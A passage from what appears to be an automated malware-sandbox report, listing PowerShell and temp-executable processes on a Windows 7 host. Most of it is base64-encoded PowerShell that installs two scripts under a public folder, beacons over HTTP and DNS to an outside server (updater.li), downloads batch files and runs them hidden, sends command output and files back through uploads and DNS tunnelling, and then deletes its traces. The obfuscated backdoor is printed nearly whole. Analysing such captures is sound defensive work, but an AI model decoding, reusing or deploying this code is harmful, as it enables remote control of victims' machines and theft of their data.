Yy5Vc2VEZWZhdWx0Q3JlZGVudGlhbHMgPSAkdHJ1ZTsNCgkJJHdjLkhlYWRlcnMuYWRkKCdBY2NlcHQnLCcqLyonKTsNCgkJJHdjLkhlYWRlcnMuYWRkKCdVc2VyLUFnZW50JywnTWljcm9zb2Z0IEJJVFMvNy43Jyk7DQoJCSR3Yy5IZWFkZXJzLmFkZCgnQWNjZXB0LUxhbmd1YWdlJywnZW4tVVMsZW47cT0wLjUnKTsNCgkJJHdjLkhlYWRlcnMuYWRkKCdBY2NlcHQtRW5jb2RpbmcnLCdnemlwLCBkZWZsYXRlJyk7DQoJCSR3Yy5IZWFkZXJzLmFkZCgnUmVmZXJlcicsJ2h0dHBzOi8vd3d3Lmdvb2dsZS5jb20nKTsNCgkJJHdjLkhlYWRlcnMuYWRkKCdQcmFnbWEnLCduby1jYWNoZScpOw0KCQkkd2MuSGVhZGVycy5hZGQoJ0NhY2hlLUNvbnRyb2wnLCduby1jYWNoZScpOw0KCQlbU3lzdGVtLkNvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygoW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbEJ5dGVzKCRmaWxlKSkpIHwgT3V0LUZpbGUgJGZpbGUgLUVuY29kaW5nIERlZmF1bHQ7DQoJCSRpPTE7DQoJCXdoaWxlKCRpIC1sZSAzKQ0KCQl7DQoJCQl0cnkNCgkJCXsNCgkJCQkkd2MuVXBsb2FkRmlsZSgkU0VSVkVSKyd1JywkZmlsZSk7DQoJCQkJYnJlYWs7DQoJCQl9DQoJCQljYXRjaCBbU3lzdGVtLk5ldC5XZWJFeGNlcHRpb25dDQoJCQl7DQoJCQkJJGkrKzsNCgkJCQljb250aW51ZTsNCgkJCX0NCgkJfQ0KCQkNCgkJaWYgKCRpIC1lcSA0KQ0KCQl7DQoJCQkkd2MuSGVhZGVycy5hZGQoJ1JlZmVyZXInLCdodHRwczovL3d3dy5nb29nbGUuY29tJyk7DQoJCQkkd2MuSGVhZGVycy5hZGQoJ0FjY2VwdCcsJyovKicpOw0KCQkJJHdjLkhlYWRlcnNbJ1VzZXItQWdlbnQnXSA9ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjM7IFdpbjY0OyB4NjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJzsNCgkJCSRpID0gMTsNCgkJCXdoaWxlKCRpIC1sZSAzKQ0KCQkJew0KCQkJCXRyeQ0KCQkJCXsNCgkJCQkJJHdjLlVwbG9hZEZpbGUoJFNFUlZFUisndScsJGZpbGUpOw0KCQkJCQlicmVhazsNCgkJCQl9DQoJCQkJY2F0Y2ggW1N5c3RlbS5OZXQuV2ViRXhjZXB0aW9uXQ0KCQkJCXsNCgkJCQkJJGkrKzsNCgkJCQkJY29udGludWU7DQoJCQkJfQ0KCQkJfQ0KCQl9DQoJfQ0KCXdhaXRmb3IgdXBscHJvYyAvVCAxOw0KCVJlbW92ZS1JdGVtICRmaWxlOw0KfQ0KDQoNCmZ1bmN0aW9uIFVwVGhlbUFsbA0Kew0KCWlmKC1ub3QoVGVzdC1QYXRoICRNWUhPTUUkVVBMSykpDQoJew0KCQlOZXctSXRlbSAkTVlIT01FJFVQTEsgLXR5cGUgZmlsZTsNCgkJR2V0LUNoaWxkSXRlbSAkTVlIT01FJFVQIHwgRm9yRWFjaC1PYmplY3R7dHJ5e1VwbG9hZEZpbGVSZW1vdmUgKCRfLkZ1bGxOYW1lKX1jYXRjaHtjb250aW51ZX19Ow0KCQlSZW1vdmUtSXRlbSAkTVlIT01FJFVQTEsgLUZvcmNlOw0KCX0NCn0NCg0KDQpmdW5jdGlvbiBEb3dubG9hZEV4ZWN1dGUNCnsNCgl0cnkNCgl7DQoJCSRiYXRmaWxlID0gRG93bmxvYWRGaWxlICgkU0VSVkVSKydiJykgKCRNWUhPTUUrJEROKTsNCgl9DQoJY2F0Y2gNCgl7DQoJCXJldHVybjsNCgl9DQoJJGFyZ3M9Ii9jICIrJGJhdGZpbGUrIiA+ICIrJGJhdGZpbGUrIi50eHQiOw0KCVN0YXJ0LVByb2Nlc3MgLVdpbmRvd1N0eWxlIEhpZGRlbiAtV2FpdCAtRmlsZVBhdGggY21kIC1Bcmd1bWVudExpc3QgJGFyZ3M7DQoJVXBsb2FkRmlsZVJlbW92ZSgkYmF0ZmlsZSsnLnR4dCcpOw0KCVJlbW92ZS1JdGVtICgkYmF0ZmlsZSk7DQp9DQoNCg0KZnVuY3Rpb24gSW5pdENoZWNrDQp7DQoJaWYoLW5vdChUZXN0LVBhdGggJE1ZSE9NRSRETikpDQoJew0KCQlOZXctSXRlbSAkTVlIT01FJEROIC10eXBlIGRpcmVjdG9yeTsNCgl9DQoJaWYoLW5vdChUZXN0LVBhdGggJE1ZSE9NRSRVUCkpDQoJew0KCQlOZXctSXRlbSAkTVlIT01FJFVQIC10eXBlIGRpcmVjdG9yeTsNCgl9DQoJaWYoLW5vdChUZXN0LVBhdGggJE1ZSE9NRSRUUCkpDQoJew0KCQlOZXctSXRlbSAkTVlIT01FJFRQIC10eXBlIGRpcmVjdG9yeTsNCgl9DQp9DQoNCg0KDQpmdW5jdGlvbiBBbGl2ZQ0Kew0KCUluaXRDaGVjazsNCglEb3duVGhlbUFsbDsNCglEb3dubG9hZEV4ZWN1dGU7DQoJVXBUaGVtQWxsOw0KfQ0KDQoNCkFsaXZlOw=='));$f=$f -replace '__',(Get-Random);$f='powershell \"&{iex ''powershell -encodedcommand \"'+([System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\"''}\"'; Set-Content 'C:\Users\Public\Libraries\RecordedTV\DnE1.Ps1' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGdsb2JhbDpteWhvc3QgPSAnLnVwZGF0ZXIubGknOw0KJGdsb2JhbDpmaWxlbmFtZSA9ICcnOw0KJGdsb2JhbDpteWZsYWcgPSAwOw0KJGdsb2JhbDpteWlkID0gJyMjIyc7DQokZ2xvYmFsOm15aG9tZSA9ICIkZW52OlB1YmxpY1xMaWJyYXJpZXNcUmVjb3JkZWRUVlwiOw0KDQoNCmZ1bmN0aW9uIGNvbnZlcnRUby1CYXNlMzYgKCRkZWNOdW09IiIpDQp7DQogICAgJGRlY051bSAlPSA0NjY1NjsNCiAgICAkYWxwaGFiZXQgPSAiMDEyMzQ1Njc4OUFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaIjsNCiAgICBkbw0KICAgIHsNCiAgICAgICAgJHJlbWFpbmRlciA9ICgkZGVjTnVtICUgMzYpOw0KICAgICAgICAkY2hhciA9ICRhbHBoYWJldC5zdWJzdHJpbmcoJHJlbWFpbmRlciwxKTsNCiAgICAgICAgJGJhc2UzNk51bSA9ICIkY2hhciRiYXNlMzZOdW0iOw0KICAgICAgICAkZGVjTnVtID0gKCRkZWNOdW0gLSAkcmVtYWluZGVyKSAvIDM2Ow0KICAgIH0NCiAgICB3aGlsZSAoJGRlY051bSAtZ3QgMCk7DQogICAgJGJhc2UzNk51bS5QYWRMZWZ0KDMsJzAnKTsNCn0NCmZ1bmN0aW9uIEdldFN1YigkbXlmbGFnMiwgJGNtZGlkPScwMCcsICRwYXJ0aWQ9JzAwMCcpDQp7DQogICAgaWYoJG15ZmxhZzIgLWVxIDApDQogICAgew0KCQkoJ3p6MDAwMDAwJysoY29udmVydFRvLUJhc2UzNihHZXQtUmFuZG9tIC1NYXhpbXVtIDQ2NjU1KSkpOw0KICAgIH0NCiAgICBlbHNlaWYoJG15ZmxhZzIgLWVxIDEpDQogICAgew0KICAgICAgICAoJ3p6JyskZ2xvYmFsOm15aWQrJzAwMDAwJysoY29udmVydFRvLUJhc2UzNihHZXQtUmFuZG9tIC1NYXhpbXVtIDQ2NjU1KSkpOw0KICAgIH0NCiAgICBlbHNlaWYoJG15ZmxhZzIgLWVxIDIpDQogICAgew0KICAgICAgICAoJ3p6JyskZ2xvYmFsOm15aWQrJGNtZGlkKyRwYXJ0aWQrKGNvbnZlcnRUby1CYXNlMzYoR2V0LVJhbmRvbSAtTWF4aW11bSA0NjY1NSkpKTsNCiAgICB9DQp9DQpmdW5jdGlvbiBTdHIySGV4KCRteXN0cikNCnsNCiAgICBbU3lzdGVtLkJpdENvbnZlcnRlcl06OlRvU3RyaW5nKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkRlZmF1bHQuR2V0Qnl0ZXMoJG15c3RyKSkuUmVwbGFjZSgiLSIsICIiKTsNCn0NCmZ1bmN0aW9uIEFsaXZlDQp7DQoJaWYoJGdsb2JhbDpteWlkIC1lcSAnIycrJyMjJykNCgl7DQoJCXJldHVybiAwOw0KCX0NCiAgICBTZW5kUmVjZWl2ZUROUyAoKEdldFN1YiAxKSsnMzAnKTsNCiAgICAkc3ViID0gKChHZXRTdWIgMSkrJzIzMkEnKSArIChTdHIySGV4ICRnbG9iYWw6ZmlsZW5hbWUpOw0KICAgICRpID0gMTsNCiAgICAkcmV0ID0gMDsNCiAgICB3aGlsZSgkZ2xvYmFsOm15ZmxhZyAtZXEgMSkNCiAgICB7DQogICAgICAgICRyZXQgPSAxOw0KICAgICAgICAkc3ViMiA9ICRzdWIgKyAoU3RyMkhleCAkaSk7DQogICAgICAgIFNlbmRSZWNlaXZlRE5TICRzdWIyOw0KICAgICAgICAkaSsrOw0KICAgIH0NCiAgICBpZigkcmV0IC1lcSAxKQ0KICAgIHsNCiAgICAgICAgRml4QmF0RmlsZSAoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsiLmJhdCIpOw0KICAgIH0NCiAgICAkcmV0Ow0KfQ0KDQpmdW5jdGlvbiBTZW5kUmVjZWl2ZUROUyAoJGQpDQp7DQoJJGNudCA9IDA7DQoJd2hpbGUgKCRjbnQgLWx0IDIwKQ0KCXsNCgkJdHJ5DQoJCXsNCgkJCSRteWRhdGEgPSAoW1N5c3RlbS5OZXQuRE5TXTo6R2V0SG9zdEJ5TmFtZSgkZCskZ2xvYmFsOm15aG9zdCkuQWRkcmVzc0xpc3RbMF0pOw0KCQkJJG15ZGF0YSA9ICgkbXlkYXRhIHwgRm9yRWFjaC1PYmplY3QgeyRfLklQQWRkcmVzc1RvU3RyaW5nfSk7DQoJCQkkY250ID0gMjU7DQoJCX0NCgkJY2F0Y2gNCgkJew0KCQkJU3RhcnQtU2xlZXAgLW0gNTAwOw0KCQkJJGNudCsrOw0KCQl9DQoJfQ0KICAgIGlmKC1ub3QoJGNudCAtZXEgMjUpKQ0KICAgIHsNCiAgICAgICAgKCcjJysnIyMnKTsNCiAgICB9DQogICAgZWxzZWlmKCRnbG9iYWw6bXlmbGFnIC1lcSAwIC1hbmQgJG15ZGF0YS5TdGFydHNXaXRoKCczMy4zMy4nKSkNCiAgICB7DQogICAgICAgICR0bXAgPSAkbXlkYXRhLlN1YlN0cmluZyg2KS5TcGxpdCgnLicpOw0KICAgICAgICAkZ2xvYmFsOmZpbGVuYW1lID0gKFtjaGFyXSBbaW50XSAkdG1wWzBdKSArIChbY2hhcl0gW2ludF0gJHRtcFsxXSk7DQogICAgICAgICRnbG9iYWw6bXlmbGFnID0gMTsNCiAgICB9DQogICAgZWxzZWlmICgkbXlkYXRhLkVxdWFscygnMzUuMzUuMzUuMzUnKSkNCiAgICB7DQogICAgICAgICRnbG9iYWw6bXlmbGFnID0gMDsNCiAgICB9DQogICAgZWxzZWlmICgkZ2xvYmFsOm15ZmxhZyAtZXEgMSkNCiAgICB7DQogICAgICAgICR0bXAgPSAkbXlkYXRhLlNwbGl0KCcuJyk7DQogICAgICAgIFtTeXN0ZW0uSU8uRmlsZV06OkFwcGVuZEFsbFRleHQoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsiLmJhdCIsICgoW2NoYXJdIFtpbnRdICR0bXBbMF0pICsgKFtjaGFyXSBbaW50XSAkdG1wWzFdKSArIChbY2hhcl0gW2ludF0gJHRtcFsyXSkgKyAoW2NoYXJdIFtpbnRdICR0bXBbM10pKSk7DQogICAgfQ0KICAgIGVsc2VpZigkZ2xvYmFsOm15aWQgLWVxICcjJysnIyMnKQ0KICAgIHsNCiAgICAgICAgKFtjaGFyXSBbaW50XSAkbXlkYXRhLlNwbGl0KCcuJylbMF0pOw0KICAgIH0NCn0NCmZ1bmN0aW9uIEZpeEJhdEZpbGUgKCRiYXRwYXRoKQ0Kew0KICAgIChHZXQtQ29udGVudCAkYmF0cGF0aCkuU3Vic3RyaW5nKDEwKSB8IFNldC1Db250ZW50ICRiYXRwYXRoOw0KfQ0KZnVuY3Rpb24gU2VuZEZpbGUoJG15RmlsZVBhdGgpDQp7DQogICAgJG15RmlsZU5hbWUgPSBbU3lzdGVtLklPLlBhdGhdOjpHZXRGaWxlTmFtZVdpdGhvdXRFeHRlbnNpb24oJG15RmlsZVBhdGgpOw0KICAgICRteXN0ciA9IFtTeXN0ZW0uSU8uRmlsZV06OlJlYWRBbGxUZXh0KCRteUZpbGVQYXRoKTsNCiAgICAkaT0wOw0KICAgICRteXRlbXAgPSAnJzsNCiAgICAkaj0wOw0KICAgIHdoaWxlKCRpIC1sZSAkbXlzdHIuTGVuZ3RoKQ0KICAgIHsNCiAgICAgICAgJG15dGVtcCArPSAkbXlzdHJbJGldOw0KICAgICAgICBpZigoKCRpJTI0KSAtZXEgMjMpIC1vciAoJGkgLWVxICRteXN0ci5MZW5ndGgpKQ0KICAgICAgICB7DQogICAgICAgICAgICAkbXloZXggPSBTdHIySGV4ICRteXRlbXA7DQogICAgICAgICAgICBTZW5kUmVjZWl2ZUROUyAoKEdldFN1YiAyICRteUZpbGVOYW1lIChjb252ZXJ0VG8tQmFzZTM2ICRqKSkgKyAkbXloZXgpOw0KICAgICAgICAgICAgJGorKzsNCiAgICAgICAgICAgICRteXRlbXAgPSAnJzsNCiAgICAgICAgfQ0KICAgICAgICAkaSsrOw0KICAgIH0NCn0NCmZ1bmN0aW9uIEdldElEDQp7DQoJJHZhbGlkY2hhcnMgPSAiMDEyMzQ1Njc4OUFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXoiOw0KICAgICR0aWQgPSBTZW5kUmVjZWl2ZUROUyAoKEdldFN1YiAwKSsnMzAnKTsNCglpZiAoJHZhbGlkY2hhcnMuQ29udGFpbnMoJHRpZCkpeyRnbG9iYWw6bXlpZD0kdGlkO30NCn0NCmZ1bmN0aW9uIENoYW5nZVRoaXNGaWxlICgkYm90aWQpDQp7DQoJaWYoLW5vdCgkZ2xvYmFsOm15aWQgLWVxICgnIycrJyMjJykpKQ0KICAgIHsNCgkJJGZjPShHZXQtQ29udGVudCAkZW52OlB1YmxpY1xMaWJyYXJpZXNcUmVjb3JkZWRUVlxEblMxLnBzMSAtRW5jb2RpbmcgQXNjaWkpOw0KCQkkZmM9JGZjLlN1YlN0cmluZyg0NykuVHJpbUVuZCgnIicnfSInKTsNCgkJJGZjPVtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGZjKSk7DQoJCSRmYz0kZmMgLXJlcGxhY2UgKCcjJysnIyMnKSwkYm90aWQ7DQoJCSRmYz1bU3lzdGVtLkNvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVbmljb2RlLkdldEJ5dGVzKCRmYykpOw0KCQkkZmM9J3Bvd2Vyc2hlbGwgIiZ7aWV4ICcncG93ZXJzaGVsbCAtZW5jb2RlZGNvbW1hbmQgIicrJGZjKyciJyd9Iic7DQoJCVNldC1Db250ZW50ICRlbnY6UHVibGljXExpYnJhcmllc1xSZWNvcmRlZFRWXERuUzEucHMxICRmYyAtRW5jb2RpbmcgQXNjaWk7DQoJfQ0KfQ0KZnVuY3Rpb24gSW5pdA0Kew0KICAgIGlmKCRnbG9iYWw6bXlpZCAtZXEgKCcjJysnIyMnKSkNCiAgICB7DQoJCW1kIC1Gb3JjZSAoJGdsb2JhbDpteWhvbWUrJ3RwXCcpOw0KCQlHZXRJRDsNCgkJQ2hhbmdlVGhpc0ZpbGUgJGdsb2JhbDpteWlkOw0KICAgIH0NCn0NCmZ1bmN0aW9uIG1haW4NCnsNCiAgICBJbml0Ow0KICAgIGlmKEFsaXZlIC1lcSAxKQ0KICAgIHsNCiAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy5iYXQgPiAnKyRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy50eHQnKTsNCiAgICAgICAgU2VuZEZpbGUgKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy50eHQnKTsNCiAgICAgICAgUmVtb3ZlLUl0ZW0gKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy5iYXQnKTsNCiAgICAgICAgUmVtb3ZlLUl0ZW0gKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy50eHQnKTsNCiAgICB9DQp9DQptYWluOw0K'));$f='powershell \"&{iex ''powershell -encodedcommand \"'+([System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\"''}\"';Set-Content 'C:\Users\Public\Libraries\RecordedTV\DnS1.Ps1' $f}"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exef77ee804de304f7c3ea6b87824684b33.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3628"C:\Users\admin\AppData\Local\Temp\f77ee804de304f7c3ea6b87824684b33.exe" C:\Users\admin\AppData\Local\Temp\f77ee804de304f7c3ea6b87824684b33.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\f77ee804de304f7c3ea6b87824684b33.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\gdi32.dll
3700"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&{iex 'powershell -encodedcommand " JABNAFkASABPAE0ARQAgAD0AIAAkAEUAbgB2ADoAUAB1AGIAbABpAGMAKwAiAFwATABpAGIAcgBhAHIAaQBlAHMAXABSAGUAYwBvAHIAZABlAGQAVABWAFwAIgA7AA0ACgAkAFMARQBSAFYARQBSACAAPQAgACIAaAB0AHQAcAA6AC8ALwB1AHAAZABhAHQAZQByAC4AbABpAC8AaQBuAGQAZQB4AC4AYQBzAHAAeAA/AGkAZAA9ADEAMAA2ADcANgA2ADcANgA3ADYAXAAiADsADQAKACQAVQBQACAAPQAgACIAdQBwAFwAIgA7AA0ACgAkAEQATgAgAD0AIAAiAGQAbgBcACIAOwANAAoAJABUAFAAIAA9ACAAIgB0AHAAXAAiADsADQAKACQAVQBQAEwASwAgAD0AIAAiAHUAcABsAG8AYwBrACIAOwANAAoAJABEAE4ATABLACAAPQAgACIAZAB3AG4AbABvAGMAawAiADsADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAaQBuAGsALAAgACQAcABhAHQAaAApAA0ACgB7AA0ACgAJACQAdwBjACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwANAAoACQAkAHcAYwAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgACQAdAByAHUAZQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAnACwAJwAqAC8AKgAnACkAOwANAAoACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAGkAYwByAG8AcwBvAGYAdAAgAEIASQBUAFMALwA3AC4ANwAnACkAOwANAAoACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQQBjAGMAZQBwAHQALQBMAGEAbgBnAHUAYQBnAGUAJwAsACcAZQBuAC0AVQBTACwAZQBuADsAcQA9ADAALgA1ACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAtAEUAbgBjAG8AZABpAG4AZwAnACwAJwBnAHoAaQBwACwAIABkAGUAZgBsAGEAdABlACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBSAGUAZgBlAHIAZQByACcALAAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGcAbwBvAGcAbABlAC4AYwBvAG0AJwApADsADQAKAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAFAAcgBhAGcAbQBhACcALAAnAG4AbwAtAGMAYQBjAGgAZQAnACkAOwANAAoACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQwBhAGMAaABlAC0AQwBvAG4AdAByAG8AbAAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkAJAByACAAPQAgAEcAZQB0AC0AUgBhAG4AZABvAG0AOwANAAoACQAkAGYAaQBsAGUAIAA9ACAAKAAkAHAAYQB0AGgALgBUAHIAaQBtAEUAbgBkACgAJwBcACcAKQApACsAJwBcACcAKwAkAHIAOwANAAoACQB0AHIAeQANAAoACQB7AA0ACgAJAAkAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABpAG4AawAsACQAZgBpAGwAZQApADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgAJAHsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAUgBlAGYAZQByAGUAcgAnACwAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBnAG8AbwBnAGwAZQAuAGMAbwBtACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0ACcALAAnACoALwAqACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAFsAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcAXQAgAD0AIAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAzADsAIABXAGkAbgA2ADQAOwAgAHgANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7AA0ACgAJAAkADQAKAAkACQB0AHIAeQANAAoACQAJAHsADQAKAAkACQAJACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAaQBuAGsALAAkAGYAaQBsAGUAKQA7AA0ACgAJAAkAfQANAAoACQAJAGMAYQB0AGMAaAANAAoACQAJAHsADQAKAAkACQAJAHQAaAByAG8AdwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0AIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwANAAoACQAJAH0ADQAKAAkAfQANAAoACQAkAGMAZAAgAD0AIAAkAHcAYwAuAFIAZQBzAHAAbwBuAHMAZQBIAGUAYQBkAGUAcgBzAFsAJwBDAG8AbgB0AGUAbgB0AC0ARABpAHMAcABvAHMAaQB0AGkAbwBuACcAXQA7AA0ACgAJACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAYwBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGMAZAAuAEkAbgBkAGUAeABPAGYAKAAnAGYAaQBsAGUAbgBhAG0AZQA9ACcAKQArADkAKQA7AA0ACgAJACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGYAaQBsAGUAbgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC0AJwAsACcALwAnACkAKQApADsADQAKAAkAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAKAAoACQAcABhAHQAaAAuAFQAcgBpAG0ARQBuAGQAKAAnAFwAJwApACkAKwAnAFwAJwArACQAZgBpAGwAZQBuAGEAbQBlACkAIAAtAFYAYQBsAHUAZQAgACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABmAGkAbABlACkAKQApACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABmAGkAbABlACAALQBGAG8AcgBjAGUAOwANAAoACQByAGUAdAB1AHIAbgAgACgAKAAkAHAAYQB0AGgALgBUAHIAaQBtAEUAbgBkACgAJwBcACcAKQApACsAJwBcACcAKwAkAGYAaQBsAGUAbgBhAG0AZQApADsADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AVABoAGUAbQBBAGwAbAANAAoAewANAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAE0AWQBIAE8ATQBFACQARABOAEwASwApACkADQAKAAkAewANAAoACQAJAE4AZQB3AC0ASQB0AGUAbQAgACQATQBZAEgATwBNAEUAJABEAE4ATABLACAALQB0AHkAcABlACAAZgBpAGwAZQA7AA0ACgAJAAkAJABpACAAPQAgADEAOwANAAoACQAJAHcAaABpAGwAZQAoACQAaQAgAC0AbABlACAAMwApAA0ACgAJAAkAewANAAoACQAJAAkAdAByAHkADQAKAAkACQAJAHsADQAKAAkACQAJAAkARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAIAAoACQAUwBFAFIAVgBFAFIAKwAnAGQAJwApACAAKAAkAE0AWQBIAE8ATQBFACsAJABEAE4AKQA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBjAGEAdABjAGgADQAKAAkACQAJAHsADQAKAAkACQAJAAkAYgByAGUAYQBrADsADQAKAAkACQAJAH0ADQAKAAkACQAJACQAaQArACsAOwANAAoACQAJAH0ADQAKAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQARABOAEwASwAgAC0ARgBvAHIAYwBlADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAVQBwAGwAbwBhAGQARgBpAGwAZQBSAGUAbQBvAHYAZQAoACQAZgBpAGwAZQApAA0ACgB7AA0ACgAJAGkAZgAoACgARwBlAHQALQBJAHQAZQBtACAAKAAkAGYAaQBsAGUAKQApAC4AbABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQANAAoACQB7AA0ACgAJAAkAJAB3AGMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAJAAkAJAB3AGMALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIAAkAHQAcgB1AGUAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAnACwAJwAqAC8AKgAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAQgBJAFQAUwAvADcALgA3ACcAKQA7AA0ACgAJAAkAJAB3AGM